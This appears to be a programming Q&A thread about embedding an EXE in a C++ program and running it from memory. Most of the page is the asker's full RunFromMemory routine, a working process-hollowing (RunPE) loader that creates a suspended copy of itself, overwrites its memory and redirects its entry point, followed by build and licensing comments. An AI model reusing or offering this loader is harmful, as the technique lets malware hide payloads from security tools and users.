# C++ add PE file as resource and execute it from memory

Tags: c++, visual-c++

I have the following program in C++ that adds an EXE file (PE) as resource and executes it from memory (no, is not malware related, I just use for a personal project a GPL exe file, so no license violation) but seems the PE file is not loaded as resource when I compile it from commandline as `cl /EHsc embed.cpp`. The full sourcecode is as follows:

embed.cpp

```
#include <windows.h>
#include <iostream>
#include "resource.h"

SECURITY_ATTRIBUTES secAttrib;

using namespace std;
void RunFromMemory(char*, char*);

int main(int argc, char* argv[])
{
HGLOBAL hResData;
HRSRC   hResInfo;
void    *pvRes;
DWORD dwSize;
char* lpMemory;
HMODULE hModule = GetModuleHandle(NULL);

if (((hResInfo = FindResource(hModule, MAKEINTRESOURCE(IDD_EXE1), RT_RCDATA)) != NULL)
    && ((hResData = LoadResource(hModule, hResInfo)) != NULL) 
    && ((pvRes = LockResource(hResData)) != NULL))
{
    dwSize = SizeofResource(hModule, hResInfo);
    lpMemory = (char*)malloc (dwSize);
    memset(lpMemory,0,dwSize);
    memcpy (lpMemory, pvRes, dwSize);
    RunFromMemory(lpMemory,argv[0]);    
}
}

void RunFromMemory(char* pImage,char* pPath)
{
    DWORD dwWritten = 0;
    DWORD dwHeader = 0; 
    DWORD dwImageSize = 0;
    DWORD dwSectionCount = 0;
    DWORD dwSectionSize = 0;
    DWORD firstSection = 0;
    DWORD previousProtection = 0;
    DWORD jmpSize = 0;

    IMAGE_NT_HEADERS INH;
    IMAGE_DOS_HEADER IDH;
    IMAGE_SECTION_HEADER Sections[1000];

    PROCESS_INFORMATION peProcessInformation;
    STARTUPINFO peStartUpInformation;
    CONTEXT pContext;

    char* pMemory;
    char* pFile;
    memcpy(&IDH,pImage,sizeof(IDH));
    memcpy(&INH,(void*)((DWORD)pImage+IDH.e_lfanew),sizeof(INH));

    dwImageSize = INH.OptionalHeader.SizeOfImage;
    pMemory = (char*)malloc(dwImageSize);
    memset(pMemory,0,dwImageSize);
    pFile = pMemory;

    dwHeader = INH.OptionalHeader.SizeOfHeaders;
    firstSection = (DWORD)(((DWORD)pImage+IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS));
    memcpy(Sections,(char*)(firstSection),sizeof(IMAGE_SECTION_HEADER)*INH.FileHeader.NumberOfSections);

    memcpy(pFile,pImage,dwHeader);

    if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment)==0)
    {
        jmpSize = INH.OptionalHeader.SizeOfHeaders;
    }
    else
    {
        jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment;
        jmpSize += 1;
        jmpSize *= INH.OptionalHeader.SectionAlignment;
    }

    pFile = (char*)((DWORD)pFile + jmpSize);

    for(dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++)
    {
        jmpSize = 0;
        dwSectionSize = Sections[dwSectionCount].SizeOfRawData;
        memcpy(pFile,(char*)(pImage + Sections[dwSectionCount].PointerToRawData),dwSectionSize);

        if((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment)==0)
        {
            jmpSize = Sections[dwSectionCount].Misc.VirtualSize;
        }
        else
        {
            jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment;
            jmpSize += 1;
            jmpSize *= INH.OptionalHeader.SectionAlignment;
        }
        pFile = (char*)((DWORD)pFile + jmpSize);
    }


    memset(&peStartUpInformation,0,sizeof(STARTUPINFO));
    memset(&peProcessInformation,0,sizeof(PROCESS_INFORMATION));
    memset(&pContext,0,sizeof(CONTEXT));

    peStartUpInformation.cb = sizeof(peStartUpInformation);
    if(CreateProcess(NULL,pPath,&secAttrib,NULL,false,CREATE_SUSPENDED,NULL,NULL,&peStartUpInformation,&peProcessInformation))
    {
        pContext.ContextFlags = CONTEXT_FULL;
        GetThreadContext(peProcessInformation.hThread,&pContext);
        VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,PAGE_EXECUTE_READWRITE,&previousProtection);
        WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),pMemory,dwImageSize,&dwWritten);
        WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)pContext.Ebx + 8),&INH.OptionalHeader.ImageBase,4,&dwWritten);
        pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint;
        SetThreadContext(peProcessInformation.hThread,&pContext);
        VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,previousProtection,0);
        ResumeThread(peProcessInformation.hThread);
    }
    free(pMemory);
}
```

app.rc

```
IDD_EXE1 RCDATA "mm.txt"
```

resource.h

```
#define IDD_EXE1                      1004
```

the `mm.txt` is my EXE file.

It compiles ok but I can't see the EXE added as resource. Any thoughts where I could be wrong?

EDIT:

As per Zevin Zenph Zambori's answer, "loaded" the exe as HEX and not resource, all works ok, the only problem my compiled console applications hangs at the end waiting for user input (carriage-return or smth...) any idea why doesn't terminate? Here is the code:

```
// compile under VC with: cl /EHsc embed.cpp
#include <windows.h>
#include <iostream>

SECURITY_ATTRIBUTES secAttrib;

using namespace std;
void RunFromMemory(char*, char*);

char _image_[] = {
0x4D,0x5A, .... ,0x00,0x00 };

int main(int argc, char* argv[])
{
    char current_file_path[1024];
    GetModuleFileNameA(0, current_file_path, 1024); // Path to current executable.
    RunFromMemory(_image_, current_file_path);
    return 0;
}

void RunFromMemory(char* pImage,char* pPath)
{
    DWORD dwWritten = 0;
    DWORD dwHeader = 0; 
    DWORD dwImageSize = 0;
    DWORD dwSectionCount = 0;
    DWORD dwSectionSize = 0;
    DWORD firstSection = 0;
    DWORD previousProtection = 0;
    DWORD jmpSize = 0;

    IMAGE_NT_HEADERS INH;
    IMAGE_DOS_HEADER IDH;
    IMAGE_SECTION_HEADER Sections[1000];

    PROCESS_INFORMATION peProcessInformation;
    STARTUPINFO peStartUpInformation;
    CONTEXT pContext;

    char* pMemory;
    char* pFile;
    memcpy(&IDH,pImage,sizeof(IDH));
    memcpy(&INH,(void*)((DWORD)pImage+IDH.e_lfanew),sizeof(INH));

    dwImageSize = INH.OptionalHeader.SizeOfImage;
    pMemory = (char*)malloc(dwImageSize);
    memset(pMemory,0,dwImageSize);
    pFile = pMemory;

    dwHeader = INH.OptionalHeader.SizeOfHeaders;
    firstSection = (DWORD)(((DWORD)pImage+IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS));
    memcpy(Sections,(char*)(firstSection),sizeof(IMAGE_SECTION_HEADER)*INH.FileHeader.NumberOfSections);

    memcpy(pFile,pImage,dwHeader);

    if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment)==0)
    {
        jmpSize = INH.OptionalHeader.SizeOfHeaders;
    }
    else
    {
        jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment;
        jmpSize += 1;
        jmpSize *= INH.OptionalHeader.SectionAlignment;
    }

    pFile = (char*)((DWORD)pFile + jmpSize);

    for(dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++)
    {
        jmpSize = 0;
        dwSectionSize = Sections[dwSectionCount].SizeOfRawData;
        memcpy(pFile,(char*)(pImage + Sections[dwSectionCount].PointerToRawData),dwSectionSize);

        if((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment)==0)
        {
            jmpSize = Sections[dwSectionCount].Misc.VirtualSize;
        }
        else
        {
            jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment;
            jmpSize += 1;
            jmpSize *= INH.OptionalHeader.SectionAlignment;
        }
        pFile = (char*)((DWORD)pFile + jmpSize);
    }


    memset(&peStartUpInformation,0,sizeof(STARTUPINFO));
    memset(&peProcessInformation,0,sizeof(PROCESS_INFORMATION));
    memset(&pContext,0,sizeof(CONTEXT));

    peStartUpInformation.cb = sizeof(peStartUpInformation);
    if(CreateProcess(NULL,pPath,&secAttrib,NULL,false,CREATE_SUSPENDED,NULL,NULL,&peStartUpInformation,&peProcessInformation))
    {
        pContext.ContextFlags = CONTEXT_FULL;
        GetThreadContext(peProcessInformation.hThread,&pContext);
        VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,PAGE_EXECUTE_READWRITE,&previousProtection);
        WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),pMemory,dwImageSize,&dwWritten);
        WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)pContext.Ebx + 8),&INH.OptionalHeader.ImageBase,4,&dwWritten);
        pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint;
        SetThreadContext(peProcessInformation.hThread,&pContext);
        VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,previousProtection,0);
        ResumeThread(peProcessInformation.hThread);
    }
    free(pMemory);
}
```

Comment: So what you want to make is basically your own version of the program loader? Remember that you have to properly handle all segments in the PE file, as well as relocation, and also remember to mark the memory where you put the actual code as executable (which I doubt can be done from a normal user-space program).

Comment: So I got it all wrong with the code?

Comment: @joachimpileborg you can mark a block of memory as executable from user-space using ´VirtualProtect´.

Comment: The source code of a program does not define if there will be any resource added to the EXE. That is controlled by the linker. What are your parameters to resource compilert and linker?

Comment: `cl /EHsc embed.cpp`, should I add app.rc in the command line as argument to the compiler?

Comment: Ok, success with `rc.exe app.rc` then `cl /EHsc embed.cpp app.RES`, now my EXE is added as resource but other problem rises: it doesn't get executed :-|

Comment: _"I just use for a personal project a GPL exe file, so no license violation"_ Does that mean that the GPL (specifically the "distribute" part) does not apply when the executable is embedded as resource? If that's your thought, I must disappoint you.

Comment: Is personal project for personal use, as far as I don't distribute it I think I'm cool so no disappoint...but I think you're off topic.

Answer (score 1):

I just tested your `RunFromMemory()` and it works fine for me.

What I did is not loading a PE file as resource during the compilation process. Instead I convert the PE into a text file containing the HEX value of all the bytes, declare a char array with the HEX values, and invoke the `RunFromMemory()` with the current PE path and the char array I declared containing the whole image.

Maybe you could try it. :)

```
char _image_[pl_len] = {0x4d, 0x5a, ......}; // bytes of the PE file.

int main()
{
    char current_file_path[1024];
    GetModuleFileNameA(0, current_file_path, 1024); // Path to current executable.
    RunFromMemory(_image_, current_file_path);
    return 0;
}
```

Comment: Could you share your working code? Without the HEX of the PE file of course.

Comment: How did you declare `pl_len`?

Answer (score 0):

I tried this and it is working.

http://www.codeproject.com/Articles/4221/Adding-and-extracting-binary-resources

Answer (score 0):

If the software has a library form then use it as-is. If it has LGPL, then there is no violation of any kind. What you want to do (adding EXE to your file and execute it from memory) is much harder (AFAIK impossible) than simply loading a DLL. Adding the EXE to your file as a resource is the least of your problems...